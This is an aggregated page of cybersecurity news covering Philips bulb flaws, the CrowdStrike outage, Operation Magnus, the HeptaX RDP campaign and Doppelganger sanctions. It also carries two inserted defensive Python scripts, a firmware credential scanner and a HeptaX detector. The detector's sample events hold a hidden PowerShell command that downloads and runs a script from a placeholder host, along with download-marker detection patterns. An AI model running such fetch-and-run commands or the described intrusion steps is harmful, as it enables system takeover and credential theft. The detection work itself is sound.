Cyber security aggregate rss news

Cyber security aggregator - feeds history

IoT Vulnerabilities ...

Cyber News

In an era where the Internet of Things (IoT) promises convenience and efficiency, the rapid adoption of smart home technology comes with hidden security risks. From smart fridges to light bulbs, IoT devices have transformed our homes into connected hubs controlled via smartphones. However, a recent report on vulnerabilities in Philips smart lighting products reveals just how easily hackers can exploit these devices to gain unauthorized access to home networks, raising concerns about the security of everyday tech.

CERT-In's Warning: Vulnerabilities in Philips Smart Lighting Products

On October 25, 2024, India's Computer Emergency Response Team (CERT-In) issued a high-severity advisory (CIVN-2024-0329) for vulnerabilities in Philips smart lighting products. The advisory highlighted the risks of storing sensitive Wi-Fi credentials in plain text within the devices' firmware. The affected devices include the Philips Smart Wi-Fi LED Batten, LED T Beamer, and a range of Smart Bulb and T-Bulb models, all running firmware versions prior to 1.33.1.

Smart light bulbs, such as Philips' Wi-Fi-enabled models, have grown popular among tech-savvy consumers. These bulbs connect to home Wi-Fi networks, allowing users to control brightness, color, and other settings from anywhere in the world through a phone app. Configuration is simple: after installation, the bulb can be toggled on and off several times to enter setup mode, which turns the device into a temporary Wi-Fi access point that a smartphone connects to for configuration.

However, this ease of use also provides an entry point for attackers. If an attacker gains physical access to one of these devices, they could extract the firmware and recover sensitive data by analyzing the binary. Storing Wi-Fi credentials in plain text simplifies the setup process, but it also makes those credentials easily accessible to anyone who obtains the firmware. Once Wi-Fi credentials are obtained, attackers can join the home network and potentially reach other connected devices and private information. CERT-In strongly recommends that users upgrade their firmware to version 1.33.1 to mitigate this vulnerability.
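The plain-text credential storage CERT-In describes is the kind of defect a firmware build pipeline can catch before an image ships. The Python script below is an added example, not code from the article, from CERT-In or from Philips: it walks a firmware image the way `strings` would, looks for wpa_supplicant-style `psk=` entries and other credential-looking key/value pairs, and reports where they sit, with values masked so the report itself does not leak the secret. The firmware blob is a constructed sample, and the list of credential field names is an assumption; the advisory does not specify field names.

```python
import re
from dataclasses import dataclass
from typing import Iterator, List, Tuple


@dataclass
class Finding:
    offset: int    # byte offset of the credential field inside the image
    key: str       # field name that matched, lower-cased (e.g. "psk")
    redacted: str  # value with all but the first two characters masked


# Field names whose values are secrets if they appear unencrypted in an image.
# ASSUMPTION: a plausible list for Wi-Fi and cloud credentials; the CERT-In
# advisory does not name the fields used in the affected firmware.
SECRET_KEYS = {"psk", "wpa_psk", "password", "passwd", "pass",
               "wifi_pass", "wifi_password", "secret", "api_key"}

# Runs of 4+ printable ASCII bytes (tab and newline allowed), like `strings`.
_PRINTABLE_RUN = re.compile(rb"[\x09\x0a\x20-\x7e]{4,}")

# key=value or key: value, with an optional double-quoted value.
_KV = re.compile(
    r'(?P<key>[A-Za-z_][A-Za-z0-9_]*)\s*[=:]\s*'
    r'(?:"(?P<quoted>[^"]*)"|(?P<bare>[^\s"]+))'
)


def redact(value: str) -> str:
    """Keep two characters so a finding can be traced to its source, mask the rest."""
    return value[:2] + "*" * max(len(value) - 2, 0)


def extract_strings(blob: bytes) -> Iterator[Tuple[int, str]]:
    """Yield (offset, text) for every printable run in the image."""
    for m in _PRINTABLE_RUN.finditer(blob):
        yield m.start(), m.group().decode("ascii")


def scan_firmware(blob: bytes) -> List[Finding]:
    """Return every credential-looking assignment found in the image."""
    findings: List[Finding] = []
    for run_offset, text in extract_strings(blob):
        for m in _KV.finditer(text):
            key = m.group("key").lower()
            if key not in SECRET_KEYS:
                continue
            value = m.group("quoted") if m.group("quoted") is not None else m.group("bare")
            findings.append(Finding(run_offset + m.start(), key, redact(value)))
    return findings


# Constructed sample image: a fake ELF header, a version string, a
# wpa_supplicant-style network block and a shell-style variable. It is NOT a
# real Philips firmware image.
SAMPLE_FIRMWARE = (
    b"\x7fELF\x01\x01\x01\x00" + b"\x00" * 16
    + b"boot v1.30.0\x00"
    + b'network={\n\tssid="HomeNet-2G"\n\tpsk="correct horse battery"\n}\n'
    + b"\x00" * 8
    + b"WIFI_PASS=hunter2\x00"
    + b"cloud_user=owner@example.com\x00"
    + b"\xff" * 32
)


if __name__ == "__main__":
    for f in scan_firmware(SAMPLE_FIRMWARE):
        print(f"offset 0x{f.offset:08x}: {f.key} = {f.redacted}")
```

Run against a real image the scanner is only a first pass: it finds credentials stored as readable strings, which is exactly the defect the advisory describes, but it cannot see values that are compressed or obfuscated, so a clean run is not proof that no secret is embedded.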
(Image) Source: CERT-In

Weak Authentication and Network Impersonation: A Recipe for Intrusion

A study examining the security weaknesses in IoT light bulbs like Philips smart bulbs revealed further vulnerabilities in the setup process. When entering configuration mode, the bulb lacks a secure authentication standard, so an attacker can create a fake access point that the user may mistakenly connect to instead of the bulb. This "man-in-the-middle" position lets the attacker intercept the communication between the user's app and the device.

The method used to authenticate devices during setup is also weak. The checksum, a security code embedded in the bulb's firmware, can be obtained through decompilation and brute force, especially since it is only 32 bits. With current computing power, it takes just over two hours on average to crack this code, enabling attackers to mimic the device and intercept user credentials such as the Wi-Fi password and manufacturer portal login.

Beyond the authentication weaknesses, the study also noted problems in the encryption used for communication between the bulb and the app. Philips smart bulbs use AES-128-CBC to secure this data. While AES-128-CBC is generally reliable, the way it is implemented in these devices opens the door to potential breaches: a determined attacker could decipher the encrypted data and access sensitive information exchanged between the bulb and the app.

Credential Stuffing and the Ripple Effect of Poor IoT Security

When attackers extract Wi-Fi credentials from a compromised device, they can go on to conduct "credential stuffing" attacks. Credential stuffing involves using one set of stolen credentials to try to access multiple accounts, since many users reuse the same password across platforms. Thus, an attacker who compromises a Philips smart bulb and obtains its credentials might use them to access the user's social media, email, or even financial accounts if the user relies on similar passwords.

The example of Philips smart bulbs sheds light on a broader issue in IoT security: weak security measures in one device can affect every other system connected to the same network.

Security Vulnerabilities in the ZigBee Protocol: The Philips Hue Case

Philips smart bulbs are not the only IoT lighting products to be scrutinized. A prior security analysis of the Philips Hue smart bulbs identified vulnerabilities in the ZigBee protocol, which is used to manage IoT devices remotely. The flaw, designated CVE-2020-6007, allowed attackers to take control of the bulb and install malware; it carries a CVSS score of 7.9, indicating a high-risk vulnerability. The ZigBee flaw enabled attackers to infiltrate the user's network via the smart bulb, spreading malware or exploiting other IoT devices connected to the network. This incident highlights the broader security concerns across IoT lighting products, as one device's weakness can be leveraged to penetrate larger home networks.

Steps Toward a Secure IoT Ecosystem

While the convenience of smart lighting and other IoT devices is undeniable, these benefits come at the cost of potential security weaknesses. Users should take proactive steps such as installing firmware updates, using unique passwords for each platform, and securing their Wi-Fi networks with strong passwords. Manufacturers, on the other hand, need to adopt robust security standards and make device security a priority from the outset. For Philips users, CERT-In recommends upgrading to firmware version 1.33.1 on all affected devices to reduce the risk of unauthorized access. Philips and other IoT manufacturers are being urged to enhance security measures to protect consumers from these vulnerabilities.

Tenable's Scott Ca ...

Business News

The recent outage at CrowdStrike, a major player in cybersecurity, serves as a critical wake-up call for organizations everywhere. Affecting over 8.5 million devices, the incident highlights the vulnerabilities that can affect even the most rigorous security frameworks. As businesses increasingly rely on technology to protect sensitive data, the need for proactive measures and resilient strategies has never been more apparent. In an exclusive interview, Scott Caveza, a staff research engineer at Tenable, shares his insights into the lessons organizations can learn from the CrowdStrike outage and how they can strengthen their cybersecurity preparedness to withstand future disruptions.

CrowdStrike Outage Lesson: The Importance of Business Resilience

Caveza emphasizes that the incident highlights the critical need for business resilience in cybersecurity. "Technology has existed long enough for us to know that defects or bugs will always exist," he notes. "However, resilience hinges not only on preventive action but also on how changes and updates are deployed within the IT environment."

The CrowdStrike outage impacted at least 8.5 million devices, highlighting the potential fallout from faulty updates. To mitigate such risks, Caveza advocates thorough testing before deploying updates. "The best practice is to test updates in a staging environment that includes rollback testing, stability testing, and interface testing," he explains. This proactive approach ensures that potential issues are identified and resolved before they affect the wider organization.

Balancing Updates with Security

When discussing the impact of outages on cybersecurity posture, Caveza asserts that resiliency in technology systems is about more than preventing outages. "It requires creating systems and policies that lead to faster recovery and the ability to continue functioning even when problems arise," he explains. He suggests that organizations prioritize testing efforts based on potential impact and implement gradual deployment strategies with strong rollback procedures. "Using centralized platforms to organize testing data and consolidate results will streamline the testing process," he adds.

The Future of Cyber Insurance

The CrowdStrike incident raises questions about the future of cyber insurance, particularly regarding systemic risks. "This outage is an example of what the insurance industry calls a systemic risk," Caveza notes. Insurers may need to adjust their risk assessments and pricing structures in response; we could see a tiered pricing structure that rewards robust defenses while penalizing poor cyber hygiene. As cyber insurance providers reevaluate their terms, the emphasis on preventive measures will likely increase. Caveza predicts that insurers will direct customers to focus on proactive strategies rather than relying solely on reactive incident response. "Preventive security measures are essential," he states. They involve obtaining visibility across the entire attack surface and identifying critical vulnerabilities.

Caveza also stresses the importance of managing the risks associated with automated updates. "A great way to mitigate single points of failure is by gaining visibility into the entire attack surface," he advises. Continuous monitoring and remediation of misconfigurations are essential to staying ahead of potential threats.

Strengthening Incident Response Strategies

Effective incident response is vital for handling unexpected service disruptions. Caveza outlines a structured approach: "Investigation and assessment of the scope of the incident come first, followed by immediate actions to prevent additional assets from being affected." Organizations must then remove the threat and restore data to a known good state to ensure business continuity. "This incident showcased how unprepared many organizations were in their incident response strategies," he adds. The lessons learned must lead to the implementation of robust strategies for future preparedness.

Enhancing Resilience Against Cyber Threats

Looking ahead, Caveza believes organizations need to reassess their quality assurance processes in light of increasing cybersecurity incidents. "Ultimately, it depends on whether the cost of the impact will be less than the cost of installing checks and balances," he explains. He concludes that organizations must have clear guidelines for activating cybersecurity plans during crises. "Regular testing of these plans is crucial, especially for large-scale incidents, to ensure quick responses and minimize losses."

Final Thoughts

The CrowdStrike outage is a clarion call for organizations to rethink their cybersecurity strategies. As Scott Caveza puts it, the landscape is fraught with risks that can emerge from the most unexpected corners. "In today's digital environment, resilience isn't just a safety net—it's a competitive advantage," he emphasizes. By embracing a culture of proactive security, thorough testing, and continuous improvement, organizations can not only shield themselves from immediate threats but also cultivate a strong posture against future disruptions. As we traverse an era of increasing cyber threats, the question isn't whether an incident will occur, but how prepared we will be when it does. The future belongs to those who prioritize resilience and adaptability in their cybersecurity frameworks, ensuring they not only survive but thrive amid the chaos.

Law Enforcement Puts ...

Cyber Essentials

International law enforcement has disrupted the operations of two of the most widely used infostealers around the globe, RedLine and Meta. According to a notice on the official website where the first details of the takedown appeared, the action was a coordinated effort led by the Dutch police and supported by the FBI and other international law enforcement partners, including the United Kingdom, Australia, Portugal and more.

"Operation Magnus disrupted operation of the Redline and Meta infostealers. Involved parties will be notified, and legal actions are underway," the notice said.

(Image) Source: operation-magnus.com

Along with the notice, the law enforcement agencies released a 50-second video stating that they "gained full access to RedLine and Meta [stealers] servers."

What's Likely Taken Down in Operation Magnus

The video further claimed that the two infostealers are essentially the same and that the version now dismantled gave unique insights into the customers who used this malware-as-a-service (MaaS) offering on the dark web. This includes the usernames, passwords, IP addresses, timestamps, registration dates, etc. of all those who registered with and bought services from this MaaS provider. Law enforcement was also likely able to gain access to the core infrastructure, including the license servers, REST API servers, the stealers themselves and even the Telegram bots the gang used to operate their network over social networking and messaging channels.

Apart from this, a scrolling list of usernames, which the authorities called "VIP clients," was also shown, but it is not clear whether these individuals have been arrested or indicted. According to the timer set on the official website, more details will be revealed in a day's time; a joint statement is expected.

(Image) Source: operation-magnus.com

The manner of setting up a website and revealing details in stages is similar to "Operation Endgame," another major international law enforcement operation, which disrupted a large-scale botnet infrastructure targeting notorious malware droppers such as IcedID, SystemBC, Pikabot, Smokeloader, Bumblebee and TrickBot.

Read: Operation Endgame – Largest Ever Operation Against Multiple Botnets Used to Deliver Ransomware

*This is a developing story and will be updated as more information is available.

HeptaX: Uncovering C ...

Firewall Daily

Cyble Research and Intelligence Labs (CRIL) has reported an ongoing cyberattack campaign orchestrated by a persistent threat group known as HeptaX. The campaign uses a variety of tactics to gain unauthorized Remote Desktop access, posing multiple risks to a wide array of users, particularly within the healthcare sector.

The campaign begins with the delivery of malicious shortcut files (.lnk) embedded in ZIP archives, likely disseminated through phishing emails. This multi-stage attack chain relies heavily on PowerShell and BAT scripts to download and execute further payloads, showing the attackers' preference for script-based techniques that can evade traditional security measures.

Once the malicious LNK file is executed, it triggers a PowerShell command that not only downloads subsequent payloads from a remote server but also creates an administrative user account on the compromised system. Remote Desktop settings are then altered to lower authentication requirements, making it easier for the threat actors to establish unauthorized remote access.

Additionally, HeptaX uses a well-known password recovery tool called ChromePass, which harvests saved passwords from Chromium-based browsers, significantly increasing the potential for broader account compromise. Due to the elusive nature of this group's tactics, CRIL has opted to track this campaign under the moniker "HeptaX."

HeptaX Campaign Overview

The HeptaX campaign exemplifies a multi-layered approach to cyber espionage. It begins with a seemingly innocuous ZIP file that contains a malicious LNK file. While the exact source of these ZIP files remains unidentified, they are strongly suspected to be spread through phishing schemes aimed at the healthcare industry.

(Image) HeptaX campaign infection chain (Source: Cyble)

Upon execution, the LNK file launches a PowerShell command that downloads additional payloads, including more PowerShell scripts and BAT files, from a remote server.
The series of scripts work in concert to establish a new user account with administrative privileges, modify Terminal Services (Remote Desktop Protocol) settings, and create a pathway for the attackers to carry out data exfiltration, malware installation, or even system surveillance.

The infection process begins with the execution of the LNK file, which leads to the download of a PowerShell script. This script retrieves a unique identifier (UID) for the compromised system, read from specific registry paths or generated if none exists.

(Image) UID Generation (Source: Cyble)

Following this, the script creates a persistent shortcut in the Windows Startup folder, ensuring that the malware remains active after a system reboot. Subsequent stages of the attack involve disabling User Account Control (UAC) settings and executing additional malicious scripts. The use of ChromePass to extract saved passwords from web browsers amplifies the risk to victims, as sensitive credentials can easily be compromised.

Technical Analysis

The HeptaX campaign is characterized by a reliance on PowerShell and Batch scripts, which give the attackers control over compromised systems. The initial PowerShell script constructs a base URL used both to send information and to download other payloads. This approach reflects a trend in cyberespionage operations where attackers favor script-based methods to bypass detection.

(Image) De-Obfuscated PowerShell Code (Source: Cyble)

The first stage of the attack involves the downloaded PowerShell script collecting system information and adjusting UAC settings. If UAC is found to be disabled or set to a lower security level, the script proceeds to download additional scripts that further compromise the system. One of the most critical stages occurs when the attackers create a new user account named "BootUEFI" with administrative rights and modify Remote Desktop settings. These adjustments facilitate seamless unauthorized access, allowing attackers to use the compromised systems at will.

Step-by-Step Breakdown of the Attack Stages

Initial Compromise: The attack begins with a phishing email containing a ZIP file. This ZIP file includes a malicious LNK file that initiates the attack upon execution.

PowerShell Execution: Once the LNK file is executed, it triggers a PowerShell command to download further payloads from a remote server. This script gathers a UID from the compromised system and sets up persistence by creating a new shortcut in the Startup folder.

UAC Manipulation: The script checks and modifies UAC settings to lower security, allowing attackers easier access to the system.

Batch File Deployment: The script downloads and executes multiple BAT files, which create the administrative account and adjust Remote Desktop settings for unauthorized access.

Final Payload Execution: The final stage involves downloading a PowerShell script that performs reconnaissance on the system and gathers sensitive information, including user credentials and network configurations.

Exploitation of Remote Desktop Access

Once the attackers have established a foothold through the "BootUEFI" account, they can take over the compromised system via Remote Desktop. This access enables them to carry out various malicious activities, including:

Installing Additional Malware: With unrestricted access, attackers can install further malware to extend their control over the system.

Data Exfiltration: Sensitive information can be siphoned off with little resistance, posing a significant threat to data privacy and integrity.

Monitoring User Activity: Attackers can surveil user actions, gaining insight into organizational processes and potentially sensitive information.

System Manipulation: They can alter system settings to further entrench their presence or create backdoors for future access.

The deployment of ChromePass within the infrastructure indicates a focused intent on harvesting saved passwords, amplifying the threat to both individuals and organizations.

Conclusion

The HeptaX campaign highlights the rising threat posed by cyber espionage operations that exploit Remote Desktop access using basic scripting languages like PowerShell and BAT, allowing for complex attacks that often go undetected.

To counter these threats, organizations should implement email filtering to block harmful attachments, educate employees on phishing risks, restrict the execution of scripting languages, establish strict policies for privileged account creation, regularly monitor User Account Control settings, strengthen Remote Desktop security with multi-factor authentication, and employ comprehensive network monitoring to detect unusual activity.

By taking these proactive steps, organizations can significantly enhance their defenses against sophisticated threats like those posed by HeptaX, fostering a more secure digital environment.
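The chain described above leaves a consistent trail on the endpoint: a PowerShell process spawned from explorer.exe with download switches, a new .lnk in the Startup folder, registry writes that relax UAC and RDP authentication, and a new local account added to Administrators. The Python script below is an added example, not Cyble's code or anything from the report; it runs those checks over a handful of constructed Sysmon- and Security-log-style events (simplified to flat dictionaries) and correlates the account-creation event with the later group-membership change. The registry value names (EnableLUA, ConsentPromptBehaviorAdmin, fDenyTSConnections, UserAuthentication) are the standard Windows locations for the settings the report describes and are an assumption here; the report does not list the exact values the scripts modify. The "BootUEFI" account name is the one the report gives; the download host is a placeholder.

```python
import re
from typing import Dict, List, Tuple

Event = Dict[str, str]
Alert = Tuple[str, str]  # (rule name, detail)

# Command-line fragments that indicate PowerShell fetching or decoding a payload.
DOWNLOAD_MARKERS = ("iwr", "invoke-webrequest", "downloadstring", "downloadfile",
                    "net.webclient", "-enc", "-encodedcommand", "frombase64string")

# Per-user Startup folder path fragment (lower-case, for matching).
STARTUP_DIR = "\\microsoft\\windows\\start menu\\programs\\startup\\"

# Registry values that weaken UAC or RDP authentication when set to 0.
# ASSUMPTION: standard Windows value names; the Cyble report does not list them.
WEAKENING_VALUES = {
    "policies\\system\\enablelua": "UAC disabled",
    "policies\\system\\consentpromptbehavioradmin": "UAC elevation prompt suppressed",
    "terminal server\\fdenytsconnections": "RDP connections enabled",
    "terminal server\\winstations\\rdp-tcp\\userauthentication": "RDP Network Level Authentication disabled",
}


def _zero_dword(details: str) -> bool:
    """True when a Sysmon 'Details' field such as 'DWORD (0x00000000)' encodes zero."""
    m = re.search(r"0x([0-9a-fA-F]+)", details or "")
    return bool(m) and int(m.group(1), 16) == 0


def detect_heptax_chain(events: List[Event]) -> List[Alert]:
    """Apply the stage detections in event order and return every alert raised."""
    alerts: List[Alert] = []
    created_accounts = set()  # names seen in 4720, for correlation with 4732
    for ev in events:
        eid = ev.get("EventID")
        image = ev.get("Image", "").lower()
        if eid == "1":  # Sysmon process creation
            parent = ev.get("ParentImage", "").lower()
            cmd = ev.get("CommandLine", "").lower()
            if (image.endswith("\\powershell.exe") and parent.endswith("\\explorer.exe")
                    and any(mk in cmd for mk in DOWNLOAD_MARKERS)):
                alerts.append(("explorer_spawned_powershell_downloader", ev["CommandLine"]))
        elif eid == "11":  # Sysmon file create
            path = ev.get("TargetFilename", "")
            if STARTUP_DIR in path.lower() and path.lower().endswith(".lnk"):
                alerts.append(("startup_folder_persistence", path))
        elif eid == "13":  # Sysmon registry value set
            target = ev.get("TargetObject", "").lower()
            for suffix, meaning in WEAKENING_VALUES.items():
                if target.endswith(suffix) and _zero_dword(ev.get("Details", "")):
                    rule = "uac_weakened" if "policies\\system" in suffix else "rdp_auth_weakened"
                    alerts.append((rule, f"{meaning}: {ev['TargetObject']}"))
        elif eid == "4720":  # Security: user account created
            created_accounts.add(ev.get("TargetUserName", "").lower())
        elif eid == "4732":  # Security: member added to a local group
            member = ev.get("MemberName", "").split("=")[-1].lower()  # strip a "CN=" prefix
            if ev.get("TargetUserName", "").lower() == "administrators" and member in created_accounts:
                alerts.append(("new_local_admin", member))
    return alerts


def distinct_stages(alerts: List[Alert]) -> int:
    """Number of different rules that fired; several stages together is the strong signal."""
    return len({rule for rule, _ in alerts})


# Constructed sample events mirroring the reported chain. Synthetic, not a real capture.
SAMPLE_EVENTS: List[Event] = [
    {"EventID": "1", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'powershell.exe -w hidden -nop -ep bypass -c "iwr http://placeholder.invalid/s.ps1 -OutFile $env:TEMP\s.ps1; & $env:TEMP\s.ps1"'},
    {"EventID": "11", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetFilename": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.lnk"},
    {"EventID": "13", "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA",
     "Details": "DWORD (0x00000000)"},
    {"EventID": "4720", "TargetUserName": "BootUEFI", "SubjectUserName": "alice"},
    {"EventID": "4732", "MemberName": "CN=BootUEFI", "TargetUserName": "Administrators"},
    {"EventID": "13", "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections",
     "Details": "DWORD (0x00000000)"},
    {"EventID": "13", "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\UserAuthentication",
     "Details": "DWORD (0x00000000)"},
    # Benign noise that must not fire any rule.
    {"EventID": "1", "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "notepad.exe notes.txt"},
]


if __name__ == "__main__":
    found = detect_heptax_chain(SAMPLE_EVENTS)
    for rule, detail in found:
        print(f"[{rule}] {detail}")
    print("distinct stages:", distinct_stages(found))
```

Each rule on its own is noisy (an administrator enabling RDP also sets fDenyTSConnections to 0), which is why the score counts distinct stages: a single host showing three or more of them within a short window is what should page someone, and the new-local-admin correlation is the one that ties the activity to the "BootUEFI" account the report names.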

UK Sanctions 3 Russi ...

Cyber News

The UK today sanctioned three Russian firms and their leaders for a propaganda campaign that attempted to weaken European support for Ukraine. The sanctions are aimed at the Russian state-funded Social Design Agency (SDA), along with partner company Structura National Technologies and PR firm ANO DIALOG, which a UK statement said "attempted to deliver a series of interference operations designed to undermine democracy and weaken international support for Ukraine."

The UK action follows a similar one by the U.S. in early September that was aimed at reducing the influence of the firms, which are also known as the "Doppelganger" disinformation campaign, on the presidential election and on U.S. views of Ukraine. U.S. officials cheered the UK news in a statement today. The UK said the action was also supported by Canada, France, the European External Action Service (EEAS), Germany and Australia.

'Doppelganger' Campaign Targeted Europe Too

In addition to its U.S. efforts, the UK said SDA "also attempted to incite protests in half a dozen European countries." The Russian campaign was low quality, however, and struggled to gain traction. "However, despite Russia pouring money into these malign organisations' interference activities, their lies have consistently struggled online, with bots and fake sites getting limited interaction," the UK statement said. "This has forced the SDA to consider buying social media views."

In a somewhat taunting statement, UK Foreign Secretary David Lammy said: "Putin is so desperate to undermine European support for Ukraine he is now resorting to clumsy, ineffective efforts to try and stoke unrest. Today's sanctions send a clear message: we will not tolerate your lies and interference, and we are coming after you. Putin's desperate attempts to divide us will fail. We will constrain the Kremlin, and stand with Ukraine for as long as it takes."

In addition to the three firms, the UK also sanctioned:

Ilya Andreevich Gambashidze, the founder of SDA
Nikolay Aleksandrovich Tupikin, the CEO of SDA and owner of Structura
Andrey Naumovich Perla, SDA Project Director

UK Accuses Firms of 'Vast Malign Network'

The sanctioned firms and individuals are responsible for a "vast malign online network ... which plagues social media with fake posts, counterfeit documents and deepfake material," the UK said. "These deceitful tactics are designed to mask the truth around Russia's illegal invasion of Ukraine and distract from the true nature of the war."

The firms' content was distributed in English, German and French through a network of at least 120 sites that spoofed existing news and government websites in an attempt to redirect unsuspecting social media users. Doppelganger's tactics included avoiding common trigger words to make sure the content made it past moderation tools. "We are working with social media platforms to ensure they are aware of this activity," the UK said. France first exposed the campaign in June 2023, and European sanctions soon followed. Doppelganger was also active in this year's European parliamentary elections.

U.S. Cheers UK Sanctions

The U.S. State Department said in a statement that it welcomes the UK actions. "An open, free, and fact-based information environment is central to a well-functioning democratic society," the U.S. statement said. "When malign actors working as tools of the Kremlin exploit and undermine that environment, democracies must respond. This and other recent exposure efforts targeting Kremlin disinformation demonstrate the growing coordination between the United States, the United Kingdom, and our multilateral partners. Together, we will continue to promote accountability for foreign malign information operations that seek to undermine our societies and democratic processes."

The U.S. statement also noted that Doppelganger engaged in a "pro-Kremlin information laundering scheme in twelve Latin American countries, where Kremlin-produced disinformation was covertly placed in local outlets to appear as genuine news articles."

Cyberattacks on Crit ...

Firewall Daily

In today's world, it's hard to miss the constant buzz about cyber threats, especially when they hit critical infrastructure and sectors like energy, healthcare, and transportation. These attacks are not just increasing in number; they're becoming more sophisticated, making it crystal clear that we need to step up our defenses.

Take recent events, for example. In February, the Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), and FBI teamed up with their partners to issue a serious warning. They alerted key infrastructure sectors to potential cyber threats, drawing attention to vulnerabilities that had already been exploited by cyber operations linked to the People's Republic of China (PRC).

And it's not just happening in the U.S.: a cyberattack on a nuclear facility in the UK recently showed how high the stakes can be when it comes to protecting infrastructure. Yet, despite all the alarms and awareness, there is still a huge gap in both legislation and international cooperation on cybersecurity.

The Dire Need for a Better Global Cyber Treaty

The current state of cybersecurity for critical infrastructure is fragmented, with a patchwork of regulations and standards that often fail to address the complexities of modern threats. Although the United Nations adopted voluntary norms in 2015, their impact has been limited. Cyber incidents targeting infrastructure reportedly doubled between 2020 and 2022, according to the International Energy Agency, highlighting the inadequacy of the current response framework.

To address this pressing issue, the international community should consider establishing a global cyber treaty specifically focused on protecting critical infrastructure. Such a treaty could build on existing frameworks, introducing binding measures that would raise global cybersecurity standards.

Currently, the cybersecurity regulatory environment comprises a mix of federal laws, industry standards, and sector-specific guidelines. However, none of these regulations provides comprehensive coverage for all critical infrastructure sectors.

Health Insurance Portability and Accountability Act (HIPAA): This federal law is crucial for safeguarding medical information, requiring healthcare providers and their associates to implement security measures to protect patient data. Despite its importance, HIPAA's scope is limited to the healthcare sector and does not extend to other critical infrastructure areas.

Cybersecurity Maturity Model Certification (CMMC): Designed for defense contractors working with the Department of Defense (DoD), the CMMC ensures these entities adhere to specific cybersecurity standards. However, its applicability is restricted to defense-related contractors, leaving other sectors without comparable protections.

Payment Card Industry Data Security Standard (PCI DSS): This industry standard, adopted widely across states, sets security requirements for entities handling credit card data. Yet PCI DSS does not encompass critical infrastructure sectors beyond financial transactions.

Communications Assistance for Law Enforcement Act (CALEA): Enforced by the Federal Communications Commission (FCC), CALEA mandates that telecommunications companies facilitate lawful interception of communications. However, CALEA's focus on law enforcement does not address broader cybersecurity concerns.

North American Electric Reliability Corporation Critical Infrastructure Protection (NERC CIP): NERC CIP guidelines are instrumental in securing the electric grid from cyber threats. Nonetheless, they are sector-specific and do not extend to other critical infrastructure areas such as transportation or manufacturing.

Despite these existing frameworks, there is no central, comprehensive approach to cybersecurity across all critical infrastructure sectors. This fragmented regulatory environment often leaves gaps that cyber adversaries can exploit.

The Case for a Unified Cybersecurity Framework

A more integrated regulatory approach is not only important; it has become urgent. Centralized regulations could establish a baseline for security practices, encouraging organizations to develop and refine their cybersecurity strategies. This would address common vulnerabilities and foster innovation in security measures. For instance, the Zero Trust model, which manages interactions between people, data, and systems to mitigate security risks, emerged in response to the need for better security in increasingly perimeterless networks.

Centralized regulations could also standardize security practices across supply chains, reducing vulnerabilities that arise from interconnected business operations. By ensuring that all parties adhere to the same security protocols, organizations can better manage and mitigate risks. This approach would not only enhance security but also build trust among stakeholders, including consumers and supply chain partners.

The current threat landscape highlights the need for better regulatory frameworks. Threats such as Advanced Persistent Threats (APTs) and the convergence of IT and Operational Technology (OT) systems pose significant challenges.

Convergence of IT and OT Systems: The integration of IT and OT systems has expanded the attack surface of critical infrastructure. Systems like industrial control systems (ICS) and supervisory control and data acquisition (SCADA) are now exposed to cyber threats that were previously limited to IT networks. This convergence highlights the need for integrated cybersecurity frameworks that address both IT and OT environments.

Advanced Persistent Threats (APTs): APTs are sophisticated, often state-sponsored attacks aimed at high-value targets over extended periods. Addressing APTs requires advanced detection and response capabilities, as well as continuous monitoring and threat intelligence. Regulations that mandate these capabilities could help organizations better defend against such attacks.

Internet of Things (IoT) and Legacy Systems: The proliferation of IoT devices introduces additional security challenges, as many are designed with minimal security controls. Moreover, critical infrastructure often relies on legacy systems that were not designed with modern cybersecurity threats in mind. Updated regulatory standards are needed to address these vulnerabilities.

Global Perspectives and Recommendations

Given the global nature of cyber threats, international cooperation is essential for protecting critical infrastructure. A global cybersecurity treaty focused on critical infrastructure could help establish universal standards and norms. Such a treaty would provide a framework for responding to cross-border cyber threats and build on existing frameworks, like the UN's guidelines on responsible state behavior in cyberspace.

Enhancing public-private partnerships is also crucial. Collaboration between government agencies, industry stakeholders, and cybersecurity experts can lead to more effective security measures and facilitate the sharing of threat intelligence. Initiatives such as the Cybersecurity and Infrastructure Security Agency (CISA) and Information Sharing and Analysis Centers (ISACs) play a vital role in fostering this collaboration.

Moreover, promoting innovation in cybersecurity is essential for staying ahead of emerging threats. Investing in research and development for new security technologies and fostering collaboration between researchers, developers, and industry practitioners can drive the development of advanced security solutions.

To Sum Up

As we navigate the complexities of our digital world, upgrading cybersecurity standards for critical infrastructure is more urgent than ever. The recent spike in cyberattacks on energy grids, healthcare systems, and transportation networks exposes a troubling stagnation and insufficiency in our current defenses.

While frameworks like HIPAA, CMMC, and PCI DSS exist, they fall short of covering all critical sectors comprehensively. The fragmented nature of today's cybersecurity landscape leaves dangerous gaps, especially as technology advances and threats become more sophisticated.

To truly tackle these challenges, the international community needs to push for a unified global cyber treaty. Such a treaty could bring a cohesive approach to protecting critical infrastructure, establishing universal standards, and enhancing global cooperation. By aligning our efforts, standardizing practices, and encouraging innovation, we can build a stronger, more resilient cybersecurity strategy capable of standing up to the evolving threats of the digital age.


 Firewall Daily

BlackBerry Limited has officially announced the establishment of its Asia Pacific (APAC) Cybersecurity Regional Headquarters in Malaysia, located in the burgeoning tech hub of Cyberjaya. The decision to set up the BlackBerry APAC HQ in Malaysia aligns with the company's long-term vision of leveraging the country’s proximity to emerging technology centers and better government infrastructure.

BlackBerry’s move is significant given the recent partnership with the Malaysian government, highlighted by a cybersecurity agreement in November 2023.

BlackBerry APAC HQ in Malaysia

This partnership with the Malaysian Communications and Multimedia Commission (MCMC) led to the creation of the Cybersecurity Center of Excellence (CCoE), a premier training facility to upskill Malaysia’s cybersecurity workforce. The center will play a crucial role in preparing professionals for the challenges posed by cyber threats.

